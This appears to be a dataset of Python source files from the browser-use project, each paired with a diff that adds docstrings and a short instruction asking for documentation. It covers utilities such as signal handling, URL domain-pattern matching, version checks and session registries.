from pydantic import BaseModel, ConfigDict, Field
class MissingCookieException(Exception):
def __init__(self, cookie_name: str, cookie_description: str):
self.cookie_name = cookie_name
self.cookie_description = cookie_description
super().__init__(f"Missing required cookie '{cookie_name}': {cookie_description}")
class Skill(BaseModel):
model_config = ConfigDict(extra='forbid', validate_assignment=True)
id: str
title: str
description: str
parameters: list[ParameterSchema]
output_schema: dict[str, Any] = Field(default_factory=dict)
@staticmethod
def from_skill_response(response: SkillResponse) -> 'Skill':
return Skill(
id=response.id,
title=response.title,
description=response.description,
parameters=response.parameters,
output_schema=response.output_schema,
)
def parameters_pydantic(self, exclude_cookies: bool = False) -> type[BaseModel]:
from browser_use.skills.utils import convert_parameters_to_pydantic
parameters = list[ParameterSchema](self.parameters)
if exclude_cookies:
parameters = [param for param in parameters if param.type != 'cookie']
return convert_parameters_to_pydantic(parameters, model_name=f'{self.title}Parameters')
@property
def output_type_pydantic(self) -> type[BaseModel] | None:
if not self.output_schema:
return None
from browser_use.skills.utils import convert_json_schema_to_pydantic
return convert_json_schema_to_pydantic(self.output_schema, model_name=f'{self.title}Output') | --- +++ @@ -1,3 +1,4 @@+"""Skills views - wraps SDK types with helper methods"""
from typing import Any
@@ -7,6 +8,12 @@
class MissingCookieException(Exception):
+ """Raised when a required cookie is missing for skill execution
+
+ Attributes:
+ cookie_name: The name of the missing cookie parameter
+ cookie_description: Description of how to obtain the cookie
+ """
def __init__(self, cookie_name: str, cookie_description: str):
self.cookie_name = cookie_name
@@ -15,6 +22,11 @@
class Skill(BaseModel):
+ """Skill model with helper methods for LLM integration
+
+ This wraps the SDK SkillResponse with additional helper properties
+ for converting schemas to Pydantic models.
+ """
model_config = ConfigDict(extra='forbid', validate_assignment=True)
@@ -26,6 +38,7 @@
@staticmethod
def from_skill_response(response: SkillResponse) -> 'Skill':
+ """Create a Skill from SDK SkillResponse"""
return Skill(
id=response.id,
title=response.title,
@@ -35,6 +48,10 @@ )
def parameters_pydantic(self, exclude_cookies: bool = False) -> type[BaseModel]:
+ """Convert parameter schemas to a pydantic model for structured output
+
+ exclude_cookies is very useful when dealing with LLMs that are not aware of cookies.
+ """
from browser_use.skills.utils import convert_parameters_to_pydantic
parameters = list[ParameterSchema](self.parameters)
@@ -46,9 +63,10 @@
@property
def output_type_pydantic(self) -> type[BaseModel] | None:
+ """Convert output schema to a pydantic model for structured output"""
if not self.output_schema:
return None
from browser_use.skills.utils import convert_json_schema_to_pydantic
- return convert_json_schema_to_pydantic(self.output_schema, model_name=f'{self.title}Output')+ return convert_json_schema_to_pydantic(self.output_schema, model_name=f'{self.title}Output')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skills/views.py |
Add documentation for all methods | import asyncio
import logging
import os
import platform
import re
import signal
import time
from collections.abc import Callable, Coroutine
from fnmatch import fnmatch
from functools import cache, wraps
from pathlib import Path
from sys import stderr
from typing import Any, ParamSpec, TypeVar
from urllib.parse import urlparse
import httpx
from dotenv import load_dotenv
load_dotenv()
# Pre-compiled regex for URL detection - used in URL shortening
URL_PATTERN = re.compile(r'https?://[^\s<>"\']+|www\.[^\s<>"\']+|[^\s<>"\']+\.[a-z]{2,}(?:/[^\s<>"\']*)?', re.IGNORECASE)
logger = logging.getLogger(__name__)
# Lazy import for error types
# Use sentinel to avoid retrying import when package is not installed
_IMPORT_NOT_FOUND: type = type('_ImportNotFound', (), {})
_openai_bad_request_error: type | None = None
_groq_bad_request_error: type | None = None
def _get_openai_bad_request_error() -> type | None:
global _openai_bad_request_error
if _openai_bad_request_error is None:
try:
from openai import BadRequestError
_openai_bad_request_error = BadRequestError
except ImportError:
_openai_bad_request_error = _IMPORT_NOT_FOUND
return _openai_bad_request_error if _openai_bad_request_error is not _IMPORT_NOT_FOUND else None
def _get_groq_bad_request_error() -> type | None:
global _groq_bad_request_error
if _groq_bad_request_error is None:
try:
from groq import BadRequestError # type: ignore[import-not-found]
_groq_bad_request_error = BadRequestError
except ImportError:
_groq_bad_request_error = _IMPORT_NOT_FOUND
return _groq_bad_request_error if _groq_bad_request_error is not _IMPORT_NOT_FOUND else None
# Global flag to prevent duplicate exit messages
_exiting = False
# Define generic type variables for return type and parameters
R = TypeVar('R')
T = TypeVar('T')
P = ParamSpec('P')
class SignalHandler:
def __init__(
self,
loop: asyncio.AbstractEventLoop | None = None,
pause_callback: Callable[[], None] | None = None,
resume_callback: Callable[[], None] | None = None,
custom_exit_callback: Callable[[], None] | None = None,
exit_on_second_int: bool = True,
interruptible_task_patterns: list[str] | None = None,
):
self.loop = loop or asyncio.get_event_loop()
self.pause_callback = pause_callback
self.resume_callback = resume_callback
self.custom_exit_callback = custom_exit_callback
self.exit_on_second_int = exit_on_second_int
self.interruptible_task_patterns = interruptible_task_patterns or ['step', 'multi_act', 'get_next_action']
self.is_windows = platform.system() == 'Windows'
# Initialize loop state attributes
self._initialize_loop_state()
# Store original signal handlers to restore them later if needed
self.original_sigint_handler = None
self.original_sigterm_handler = None
def _initialize_loop_state(self) -> None:
setattr(self.loop, 'ctrl_c_pressed', False)
setattr(self.loop, 'waiting_for_input', False)
def register(self) -> None:
try:
if self.is_windows:
# On Windows, use simple signal handling with immediate exit on Ctrl+C
def windows_handler(sig, frame):
print('\n\n🛑 Got Ctrl+C. Exiting immediately on Windows...\n', file=stderr)
# Run the custom exit callback if provided
if self.custom_exit_callback:
self.custom_exit_callback()
os._exit(0)
self.original_sigint_handler = signal.signal(signal.SIGINT, windows_handler)
else:
# On Unix-like systems, use asyncio's signal handling for smoother experience
self.original_sigint_handler = self.loop.add_signal_handler(signal.SIGINT, lambda: self.sigint_handler())
self.original_sigterm_handler = self.loop.add_signal_handler(signal.SIGTERM, lambda: self.sigterm_handler())
except Exception:
# there are situations where signal handlers are not supported, e.g.
# - when running in a thread other than the main thread
# - some operating systems
# - inside jupyter notebooks
pass
def unregister(self) -> None:
try:
if self.is_windows:
# On Windows, just restore the original SIGINT handler
if self.original_sigint_handler:
signal.signal(signal.SIGINT, self.original_sigint_handler)
else:
# On Unix-like systems, use asyncio's signal handler removal
self.loop.remove_signal_handler(signal.SIGINT)
self.loop.remove_signal_handler(signal.SIGTERM)
# Restore original handlers if available
if self.original_sigint_handler:
signal.signal(signal.SIGINT, self.original_sigint_handler)
if self.original_sigterm_handler:
signal.signal(signal.SIGTERM, self.original_sigterm_handler)
except Exception as e:
logger.warning(f'Error while unregistering signal handlers: {e}')
def _handle_second_ctrl_c(self) -> None:
global _exiting
if not _exiting:
_exiting = True
# Call custom exit callback if provided
if self.custom_exit_callback:
try:
self.custom_exit_callback()
except Exception as e:
logger.error(f'Error in exit callback: {e}')
# Force immediate exit - more reliable than sys.exit()
print('\n\n🛑 Got second Ctrl+C. Exiting immediately...\n', file=stderr)
# Reset terminal to a clean state by sending multiple escape sequences
# Order matters for terminal resets - we try different approaches
# Reset terminal modes for both stdout and stderr
print('\033[?25h', end='', flush=True, file=stderr) # Show cursor
print('\033[?25h', end='', flush=True) # Show cursor
# Reset text attributes and terminal modes
print('\033[0m', end='', flush=True, file=stderr) # Reset text attributes
print('\033[0m', end='', flush=True) # Reset text attributes
# Disable special input modes that may cause arrow keys to output control chars
print('\033[?1l', end='', flush=True, file=stderr) # Reset cursor keys to normal mode
print('\033[?1l', end='', flush=True) # Reset cursor keys to normal mode
# Disable bracketed paste mode
print('\033[?2004l', end='', flush=True, file=stderr)
print('\033[?2004l', end='', flush=True)
# Carriage return helps ensure a clean line
print('\r', end='', flush=True, file=stderr)
print('\r', end='', flush=True)
# these ^^ attempts dont work as far as we can tell
# we still dont know what causes the broken input, if you know how to fix it, please let us know
print('(tip: press [Enter] once to fix escape codes appearing after chrome exit)', file=stderr)
os._exit(0)
def sigint_handler(self) -> None:
global _exiting
if _exiting:
# Already exiting, force exit immediately
os._exit(0)
if getattr(self.loop, 'ctrl_c_pressed', False):
# If we're in the waiting for input state, let the pause method handle it
if getattr(self.loop, 'waiting_for_input', False):
return
# Second Ctrl+C - exit immediately if configured to do so
if self.exit_on_second_int:
self._handle_second_ctrl_c()
# Mark that Ctrl+C was pressed
setattr(self.loop, 'ctrl_c_pressed', True)
# Cancel current tasks that should be interruptible - this is crucial for immediate pausing
self._cancel_interruptible_tasks()
# Call pause callback if provided - this sets the paused flag
if self.pause_callback:
try:
self.pause_callback()
except Exception as e:
logger.error(f'Error in pause callback: {e}')
# Log pause message after pause_callback is called (not before)
print('----------------------------------------------------------------------', file=stderr)
def sigterm_handler(self) -> None:
global _exiting
if not _exiting:
_exiting = True
print('\n\n🛑 SIGTERM received. Exiting immediately...\n\n', file=stderr)
# Call custom exit callback if provided
if self.custom_exit_callback:
self.custom_exit_callback()
os._exit(0)
def _cancel_interruptible_tasks(self) -> None:
current_task = asyncio.current_task(self.loop)
for task in asyncio.all_tasks(self.loop):
if task != current_task and not task.done():
task_name = task.get_name() if hasattr(task, 'get_name') else str(task)
# Cancel tasks that match certain patterns
if any(pattern in task_name for pattern in self.interruptible_task_patterns):
logger.debug(f'Cancelling task: {task_name}')
task.cancel()
# Add exception handler to silence "Task exception was never retrieved" warnings
task.add_done_callback(lambda t: t.exception() if t.cancelled() else None)
# Also cancel the current task if it's interruptible
if current_task and not current_task.done():
task_name = current_task.get_name() if hasattr(current_task, 'get_name') else str(current_task)
if any(pattern in task_name for pattern in self.interruptible_task_patterns):
logger.debug(f'Cancelling current task: {task_name}')
current_task.cancel()
def wait_for_resume(self) -> None:
# Set flag to indicate we're waiting for input
setattr(self.loop, 'waiting_for_input', True)
# Temporarily restore default signal handling for SIGINT
# This ensures KeyboardInterrupt will be raised during input()
original_handler = signal.getsignal(signal.SIGINT)
try:
signal.signal(signal.SIGINT, signal.default_int_handler)
except ValueError:
# we are running in a thread other than the main thread
# or signal handlers are not supported for some other reason
pass
green = '\x1b[32;1m'
red = '\x1b[31m'
blink = '\033[33;5m'
unblink = '\033[0m'
reset = '\x1b[0m'
try: # escape code is to blink the ...
print(
f'➡️ Press {green}[Enter]{reset} to resume or {red}[Ctrl+C]{reset} again to exit{blink}...{unblink} ',
end='',
flush=True,
file=stderr,
)
input() # This will raise KeyboardInterrupt on Ctrl+C
# Call resume callback if provided
if self.resume_callback:
self.resume_callback()
except KeyboardInterrupt:
# Use the shared method to handle second Ctrl+C
self._handle_second_ctrl_c()
finally:
try:
# Restore our signal handler
signal.signal(signal.SIGINT, original_handler)
setattr(self.loop, 'waiting_for_input', False)
except Exception:
pass
def reset(self) -> None:
# Clear the flags
if hasattr(self.loop, 'ctrl_c_pressed'):
setattr(self.loop, 'ctrl_c_pressed', False)
if hasattr(self.loop, 'waiting_for_input'):
setattr(self.loop, 'waiting_for_input', False)
def time_execution_sync(additional_text: str = '') -> Callable[[Callable[P, R]], Callable[P, R]]:
def decorator(func: Callable[P, R]) -> Callable[P, R]:
@wraps(func)
def wrapper(*args: P.args, **kwargs: P.kwargs) -> R:
start_time = time.time()
result = func(*args, **kwargs)
execution_time = time.time() - start_time
# Only log if execution takes more than 0.25 seconds
if execution_time > 0.25:
self_has_logger = args and getattr(args[0], 'logger', None)
if self_has_logger:
logger = getattr(args[0], 'logger')
elif 'agent' in kwargs:
logger = getattr(kwargs['agent'], 'logger')
elif 'browser_session' in kwargs:
logger = getattr(kwargs['browser_session'], 'logger')
else:
logger = logging.getLogger(__name__)
logger.debug(f'⏳ {additional_text.strip("-")}() took {execution_time:.2f}s')
return result
return wrapper
return decorator
def time_execution_async(
additional_text: str = '',
) -> Callable[[Callable[P, Coroutine[Any, Any, R]]], Callable[P, Coroutine[Any, Any, R]]]:
def decorator(func: Callable[P, Coroutine[Any, Any, R]]) -> Callable[P, Coroutine[Any, Any, R]]:
@wraps(func)
async def wrapper(*args: P.args, **kwargs: P.kwargs) -> R:
start_time = time.time()
result = await func(*args, **kwargs)
execution_time = time.time() - start_time
# Only log if execution takes more than 0.25 seconds to avoid spamming the logs
# you can lower this threshold locally when you're doing dev work to performance optimize stuff
if execution_time > 0.25:
self_has_logger = args and getattr(args[0], 'logger', None)
if self_has_logger:
logger = getattr(args[0], 'logger')
elif 'agent' in kwargs:
logger = getattr(kwargs['agent'], 'logger')
elif 'browser_session' in kwargs:
logger = getattr(kwargs['browser_session'], 'logger')
else:
logger = logging.getLogger(__name__)
logger.debug(f'⏳ {additional_text.strip("-")}() took {execution_time:.2f}s')
return result
return wrapper
return decorator
def singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
def check_env_variables(keys: list[str], any_or_all=all) -> bool:
return any_or_all(os.getenv(key, '').strip() for key in keys)
def is_unsafe_pattern(pattern: str) -> bool:
# Extract domain part if there's a scheme
if '://' in pattern:
_, pattern = pattern.split('://', 1)
# Remove safe patterns (*.domain and domain.*)
bare_domain = pattern.replace('.*', '').replace('*.', '')
# If there are still wildcards, it's potentially unsafe
return '*' in bare_domain
def is_new_tab_page(url: str) -> bool:
return url in ('about:blank', 'chrome://new-tab-page/', 'chrome://new-tab-page', 'chrome://newtab/', 'chrome://newtab')
def match_url_with_domain_pattern(url: str, domain_pattern: str, log_warnings: bool = False) -> bool:
try:
# Note: new tab pages should be handled at the callsite, not here
if is_new_tab_page(url):
return False
parsed_url = urlparse(url)
# Extract only the hostname and scheme components
scheme = parsed_url.scheme.lower() if parsed_url.scheme else ''
domain = parsed_url.hostname.lower() if parsed_url.hostname else ''
if not scheme or not domain:
return False
# Normalize the domain pattern
domain_pattern = domain_pattern.lower()
# Handle pattern with scheme
if '://' in domain_pattern:
pattern_scheme, pattern_domain = domain_pattern.split('://', 1)
else:
pattern_scheme = 'https' # Default to matching only https for security
pattern_domain = domain_pattern
# Handle port in pattern (we strip ports from patterns since we already
# extracted only the hostname from the URL)
if ':' in pattern_domain and not pattern_domain.startswith(':'):
pattern_domain = pattern_domain.split(':', 1)[0]
# If scheme doesn't match, return False
if not fnmatch(scheme, pattern_scheme):
return False
# Check for exact match
if pattern_domain == '*' or domain == pattern_domain:
return True
# Handle glob patterns
if '*' in pattern_domain:
# Check for unsafe glob patterns
# First, check for patterns like *.*.domain which are unsafe
if pattern_domain.count('*.') > 1 or pattern_domain.count('.*') > 1:
if log_warnings:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Multiple wildcards in pattern=[{domain_pattern}] are not supported')
return False # Don't match unsafe patterns
# Check for wildcards in TLD part (example.*)
if pattern_domain.endswith('.*'):
if log_warnings:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Wildcard TLDs like in pattern=[{domain_pattern}] are not supported for security')
return False # Don't match unsafe patterns
# Then check for embedded wildcards
bare_domain = pattern_domain.replace('*.', '')
if '*' in bare_domain:
if log_warnings:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Only *.domain style patterns are supported, ignoring pattern=[{domain_pattern}]')
return False # Don't match unsafe patterns
# Special handling so that *.google.com also matches bare google.com
if pattern_domain.startswith('*.'):
parent_domain = pattern_domain[2:]
if domain == parent_domain or fnmatch(domain, parent_domain):
return True
# Normal case: match domain against pattern
if fnmatch(domain, pattern_domain):
return True
return False
except Exception as e:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Error matching URL {url} with pattern {domain_pattern}: {type(e).__name__}: {e}')
return False
def merge_dicts(a: dict, b: dict, path: tuple[str, ...] = ()):
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
merge_dicts(a[key], b[key], path + (str(key),))
elif isinstance(a[key], list) and isinstance(b[key], list):
a[key] = a[key] + b[key]
elif a[key] != b[key]:
raise Exception('Conflict at ' + '.'.join(path + (str(key),)))
else:
a[key] = b[key]
return a
@cache
def get_browser_use_version() -> str:
try:
package_root = Path(__file__).parent.parent
pyproject_path = package_root / 'pyproject.toml'
# Try to read version from pyproject.toml
if pyproject_path.exists():
import re
with open(pyproject_path, encoding='utf-8') as f:
content = f.read()
match = re.search(r'version\s*=\s*["\']([^"\']+)["\']', content)
if match:
version = f'{match.group(1)}'
os.environ['LIBRARY_VERSION'] = version # used by bubus event_schema so all Event schemas include versioning
return version
# If pyproject.toml doesn't exist, try getting version from pip
from importlib.metadata import version as get_version
version = str(get_version('browser-use'))
os.environ['LIBRARY_VERSION'] = version
return version
except Exception as e:
logger.debug(f'Error detecting browser-use version: {type(e).__name__}: {e}')
return 'unknown'
async def check_latest_browser_use_version() -> str | None:
try:
async with httpx.AsyncClient(timeout=3.0) as client:
response = await client.get('https://pypi.org/pypi/browser-use/json')
if response.status_code == 200:
data = response.json()
return data['info']['version']
except Exception:
# Silently fail - we don't want to break agent startup due to network issues
pass
return None
@cache
def get_git_info() -> dict[str, str] | None:
try:
import subprocess
package_root = Path(__file__).parent.parent
git_dir = package_root / '.git'
if not git_dir.exists():
return None
# Get git commit hash
commit_hash = (
subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=package_root, stderr=subprocess.DEVNULL).decode().strip()
)
# Get git branch
branch = (
subprocess.check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD'], cwd=package_root, stderr=subprocess.DEVNULL)
.decode()
.strip()
)
# Get remote URL
remote_url = (
subprocess.check_output(['git', 'config', '--get', 'remote.origin.url'], cwd=package_root, stderr=subprocess.DEVNULL)
.decode()
.strip()
)
# Get commit timestamp
commit_timestamp = (
subprocess.check_output(['git', 'show', '-s', '--format=%ci', 'HEAD'], cwd=package_root, stderr=subprocess.DEVNULL)
.decode()
.strip()
)
return {'commit_hash': commit_hash, 'branch': branch, 'remote_url': remote_url, 'commit_timestamp': commit_timestamp}
except Exception as e:
logger.debug(f'Error getting git info: {type(e).__name__}: {e}')
return None
def _log_pretty_path(path: str | Path | None) -> str:
if not path or not str(path).strip():
return '' # always falsy in -> falsy out so it can be used in ternaries
# dont print anything thats not a path
if not isinstance(path, (str, Path)):
# no other types are safe to just str(path) and log to terminal unless we know what they are
# e.g. what if we get storage_date=dict | Path and the dict version could contain real cookies
return f'<{type(path).__name__}>'
# replace home dir and cwd with ~ and .
pretty_path = str(path).replace(str(Path.home()), '~').replace(str(Path.cwd().resolve()), '.')
# wrap in quotes if it contains spaces
if pretty_path.strip() and ' ' in pretty_path:
pretty_path = f'"{pretty_path}"'
return pretty_path
def _log_pretty_url(s: str, max_len: int | None = 22) -> str:
s = s.replace('https://', '').replace('http://', '').replace('www.', '')
if max_len is not None and len(s) > max_len:
return s[:max_len] + '…'
return s
def create_task_with_error_handling(
coro: Coroutine[Any, Any, T],
*,
name: str | None = None,
logger_instance: logging.Logger | None = None,
suppress_exceptions: bool = False,
) -> asyncio.Task[T]:
task = asyncio.create_task(coro, name=name)
log = logger_instance or logger
def _handle_task_exception(t: asyncio.Task[T]) -> None:
exc_to_raise = None
try:
# This will raise if the task had an exception
exc = t.exception()
if exc is not None:
task_name = t.get_name() if hasattr(t, 'get_name') else 'unnamed'
if suppress_exceptions:
log.error(f'Exception in background task [{task_name}]: {type(exc).__name__}: {exc}', exc_info=exc)
else:
# Log at warning level then mark for re-raising
log.warning(
f'Exception in background task [{task_name}]: {type(exc).__name__}: {exc}',
exc_info=exc,
)
exc_to_raise = exc
except asyncio.CancelledError:
# Task was cancelled, this is normal behavior
pass
except Exception as e:
# Catch any other exception during exception handling (e.g., t.exception() itself failing)
task_name = t.get_name() if hasattr(t, 'get_name') else 'unnamed'
log.error(f'Error handling exception in task [{task_name}]: {type(e).__name__}: {e}')
# Re-raise outside the try-except block so it propagates to the event loop
if exc_to_raise is not None:
raise exc_to_raise
task.add_done_callback(_handle_task_exception)
return task
def sanitize_surrogates(text: str) -> str:
return text.encode('utf-8', errors='ignore').decode('utf-8') | --- +++ @@ -32,6 +32,7 @@
def _get_openai_bad_request_error() -> type | None:
+ """Lazy loader for OpenAI BadRequestError."""
global _openai_bad_request_error
if _openai_bad_request_error is None:
try:
@@ -44,6 +45,7 @@
def _get_groq_bad_request_error() -> type | None:
+ """Lazy loader for Groq BadRequestError."""
global _groq_bad_request_error
if _groq_bad_request_error is None:
try:
@@ -65,6 +67,17 @@
class SignalHandler:
+ """
+ A modular and reusable signal handling system for managing SIGINT (Ctrl+C), SIGTERM,
+ and other signals in asyncio applications.
+
+ This class provides:
+ - Configurable signal handling for SIGINT and SIGTERM
+ - Support for custom pause/resume callbacks
+ - Management of event loop state across signals
+ - Standardized handling of first and second Ctrl+C presses
+ - Cross-platform compatibility (with simplified behavior on Windows)
+ """
def __init__(
self,
@@ -75,6 +88,18 @@ exit_on_second_int: bool = True,
interruptible_task_patterns: list[str] | None = None,
):
+ """
+ Initialize the signal handler.
+
+ Args:
+ loop: The asyncio event loop to use. Defaults to current event loop.
+ pause_callback: Function to call when system is paused (first Ctrl+C)
+ resume_callback: Function to call when system is resumed
+ custom_exit_callback: Function to call on exit (second Ctrl+C or SIGTERM)
+ exit_on_second_int: Whether to exit on second SIGINT (Ctrl+C)
+ interruptible_task_patterns: List of patterns to match task names that should be
+ canceled on first Ctrl+C (default: ['step', 'multi_act', 'get_next_action'])
+ """
self.loop = loop or asyncio.get_event_loop()
self.pause_callback = pause_callback
self.resume_callback = resume_callback
@@ -91,10 +116,12 @@ self.original_sigterm_handler = None
def _initialize_loop_state(self) -> None:
+ """Initialize loop state attributes used for signal handling."""
setattr(self.loop, 'ctrl_c_pressed', False)
setattr(self.loop, 'waiting_for_input', False)
def register(self) -> None:
+ """Register signal handlers for SIGINT and SIGTERM."""
try:
if self.is_windows:
# On Windows, use simple signal handling with immediate exit on Ctrl+C
@@ -119,6 +146,7 @@ pass
def unregister(self) -> None:
+ """Unregister signal handlers and restore original handlers if possible."""
try:
if self.is_windows:
# On Windows, just restore the original SIGINT handler
@@ -138,6 +166,10 @@ logger.warning(f'Error while unregistering signal handlers: {e}')
def _handle_second_ctrl_c(self) -> None:
+ """
+ Handle a second Ctrl+C press by performing cleanup and exiting.
+ This is shared logic used by both sigint_handler and wait_for_resume.
+ """
global _exiting
if not _exiting:
@@ -183,6 +215,12 @@ os._exit(0)
def sigint_handler(self) -> None:
+ """
+ SIGINT (Ctrl+C) handler.
+
+ First Ctrl+C: Cancel current step and pause.
+ Second Ctrl+C: Exit immediately if exit_on_second_int is True.
+ """
global _exiting
if _exiting:
@@ -215,6 +253,11 @@ print('----------------------------------------------------------------------', file=stderr)
def sigterm_handler(self) -> None:
+ """
+ SIGTERM handler.
+
+ Always exits the program completely.
+ """
global _exiting
if not _exiting:
_exiting = True
@@ -227,6 +270,7 @@ os._exit(0)
def _cancel_interruptible_tasks(self) -> None:
+ """Cancel current tasks that should be interruptible."""
current_task = asyncio.current_task(self.loop)
for task in asyncio.all_tasks(self.loop):
if task != current_task and not task.done():
@@ -246,6 +290,13 @@ current_task.cancel()
def wait_for_resume(self) -> None:
+ """
+ Wait for user input to resume or exit.
+
+ This method should be called after handling the first Ctrl+C.
+ It temporarily restores default signal handling to allow catching
+ a second Ctrl+C directly.
+ """
# Set flag to indicate we're waiting for input
setattr(self.loop, 'waiting_for_input', True)
@@ -289,6 +340,7 @@ pass
def reset(self) -> None:
+ """Reset state after resuming."""
# Clear the flags
if hasattr(self.loop, 'ctrl_c_pressed'):
setattr(self.loop, 'ctrl_c_pressed', False)
@@ -363,10 +415,20 @@
def check_env_variables(keys: list[str], any_or_all=all) -> bool:
+ """Check if all required environment variables are set"""
return any_or_all(os.getenv(key, '').strip() for key in keys)
def is_unsafe_pattern(pattern: str) -> bool:
+ """
+ Check if a domain pattern has complex wildcards that could match too many domains.
+
+ Args:
+ pattern: The domain pattern to check
+
+ Returns:
+ bool: True if the pattern has unsafe wildcards, False otherwise
+ """
# Extract domain part if there's a scheme
if '://' in pattern:
_, pattern = pattern.split('://', 1)
@@ -379,10 +441,41 @@
def is_new_tab_page(url: str) -> bool:
+ """
+ Check if a URL is a new tab page (about:blank, chrome://new-tab-page, or chrome://newtab).
+
+ Args:
+ url: The URL to check
+
+ Returns:
+ bool: True if the URL is a new tab page, False otherwise
+ """
return url in ('about:blank', 'chrome://new-tab-page/', 'chrome://new-tab-page', 'chrome://newtab/', 'chrome://newtab')
def match_url_with_domain_pattern(url: str, domain_pattern: str, log_warnings: bool = False) -> bool:
+ """
+ Check if a URL matches a domain pattern. SECURITY CRITICAL.
+
+ Supports optional glob patterns and schemes:
+ - *.example.com will match sub.example.com and example.com
+ - *google.com will match google.com, agoogle.com, and www.google.com
+ - http*://example.com will match http://example.com, https://example.com
+ - chrome-extension://* will match chrome-extension://aaaaaaaaaaaa and chrome-extension://bbbbbbbbbbbbb
+
+ When no scheme is specified, https is used by default for security.
+ For example, 'example.com' will match 'https://example.com' but not 'http://example.com'.
+
+ Note: New tab pages (about:blank, chrome://new-tab-page) must be handled at the callsite, not inside this function.
+
+ Args:
+ url: The URL to check
+ domain_pattern: Domain pattern to match against
+ log_warnings: Whether to log warnings about unsafe patterns
+
+ Returns:
+ bool: True if the URL matches the pattern, False otherwise
+ """
try:
# Note: new tab pages should be handled at the callsite, not here
if is_new_tab_page(url):
@@ -478,6 +571,7 @@
@cache
def get_browser_use_version() -> str:
+ """Get the browser-use package version using the same logic as Agent._set_browser_use_version_and_source"""
try:
package_root = Path(__file__).parent.parent
pyproject_path = package_root / 'pyproject.toml'
@@ -507,6 +601,11 @@
async def check_latest_browser_use_version() -> str | None:
+ """Check the latest version of browser-use from PyPI asynchronously.
+
+ Returns:
+ The latest version string if successful, None if failed
+ """
try:
async with httpx.AsyncClient(timeout=3.0) as client:
response = await client.get('https://pypi.org/pypi/browser-use/json')
@@ -521,6 +620,7 @@
@cache
def get_git_info() -> dict[str, str] | None:
+ """Get git information if installed from git repository"""
try:
import subprocess
@@ -562,6 +662,7 @@
def _log_pretty_path(path: str | Path | None) -> str:
+ """Pretty-print a path, shorten home dir to ~ and cwd to ."""
if not path or not str(path).strip():
return '' # always falsy in -> falsy out so it can be used in ternaries
@@ -583,6 +684,7 @@
def _log_pretty_url(s: str, max_len: int | None = 22) -> str:
+ """Truncate/pretty-print a URL with a maximum length, removing the protocol and www. prefix"""
s = s.replace('https://', '').replace('http://', '').replace('www.', '')
if max_len is not None and len(s) > max_len:
return s[:max_len] + '…'
@@ -596,10 +698,33 @@ logger_instance: logging.Logger | None = None,
suppress_exceptions: bool = False,
) -> asyncio.Task[T]:
+ """
+ Create an asyncio task with proper exception handling to prevent "Task exception was never retrieved" warnings.
+
+ Args:
+ coro: The coroutine to wrap in a task
+ name: Optional name for the task (useful for debugging)
+ logger_instance: Optional logger instance to use. If None, uses module logger.
+ suppress_exceptions: If True, logs exceptions at ERROR level. If False, logs at WARNING level
+ and exceptions remain retrievable via task.exception() if the caller awaits the task.
+ Default False.
+
+ Returns:
+ asyncio.Task: The created task with exception handling callback
+
+ Example:
+ # Fire-and-forget with suppressed exceptions
+ create_task_with_error_handling(some_async_function(), name="my_task", suppress_exceptions=True)
+
+ # Task with retrievable exceptions (if you plan to await it)
+ task = create_task_with_error_handling(critical_function(), name="critical")
+ result = await task # Will raise the exception if one occurred
+ """
task = asyncio.create_task(coro, name=name)
log = logger_instance or logger
def _handle_task_exception(t: asyncio.Task[T]) -> None:
+ """Callback to handle task exceptions"""
exc_to_raise = None
try:
# This will raise if the task had an exception
@@ -632,4 +757,15 @@
def sanitize_surrogates(text: str) -> str:
- return text.encode('utf-8', errors='ignore').decode('utf-8')+ """Remove surrogate characters that can't be encoded in UTF-8.
+
+ Surrogate pairs (U+D800 to U+DFFF) are invalid in UTF-8 when unpaired.
+ These often appear in DOM content from mathematical symbols or emojis.
+
+ Args:
+ text: The text to sanitize
+
+ Returns:
+ Text with surrogate characters removed
+ """
+ return text.encode('utf-8', errors='ignore').decode('utf-8')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/utils.py |
Document helper functions with docstrings |
from typing import Any
from pydantic import BaseModel, ConfigDict, Field
class ExtractionResult(BaseModel):
model_config = ConfigDict(extra='forbid')
data: dict[str, Any] = Field(description='The validated extraction payload')
schema_used: dict[str, Any] = Field(description='The JSON Schema that was enforced')
is_partial: bool = Field(default=False, description='True if content was truncated before extraction')
source_url: str | None = Field(default=None, description='URL the content was extracted from')
content_stats: dict[str, Any] = Field(default_factory=dict, description='Content processing statistics') | --- +++ @@ -1,3 +1,4 @@+"""Pydantic models for the extraction subsystem."""
from typing import Any
@@ -5,6 +6,7 @@
class ExtractionResult(BaseModel):
+ """Metadata about a structured extraction, stored in ActionResult.metadata."""
model_config = ConfigDict(extra='forbid')
@@ -12,4 +14,4 @@ schema_used: dict[str, Any] = Field(description='The JSON Schema that was enforced')
is_partial: bool = Field(default=False, description='True if content was truncated before extraction')
source_url: str | None = Field(default=None, description='URL the content was extracted from')
- content_stats: dict[str, Any] = Field(default_factory=dict, description='Content processing statistics')+ content_stats: dict[str, Any] = Field(default_factory=dict, description='Content processing statistics')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/extraction/views.py |
Help me add docstrings to my project |
import logging
from dataclasses import dataclass, field
from typing import Any
from browser_use.browser.session import BrowserSession
from browser_use.skill_cli.python_session import PythonSession
logger = logging.getLogger(__name__)
@dataclass
class SessionInfo:
name: str
browser_mode: str
headed: bool
profile: str | None
browser_session: BrowserSession
python_session: PythonSession = field(default_factory=PythonSession)
class SessionRegistry:
def __init__(self) -> None:
self._sessions: dict[str, SessionInfo] = {}
async def get_or_create(
self,
name: str,
browser_mode: str,
headed: bool,
profile: str | None,
) -> SessionInfo:
if name in self._sessions:
return self._sessions[name]
logger.info(f'Creating new session: {name} (mode={browser_mode}, headed={headed})')
browser_session = await create_browser_session(browser_mode, headed, profile)
await browser_session.start()
session_info = SessionInfo(
name=name,
browser_mode=browser_mode,
headed=headed,
profile=profile,
browser_session=browser_session,
)
self._sessions[name] = session_info
return session_info
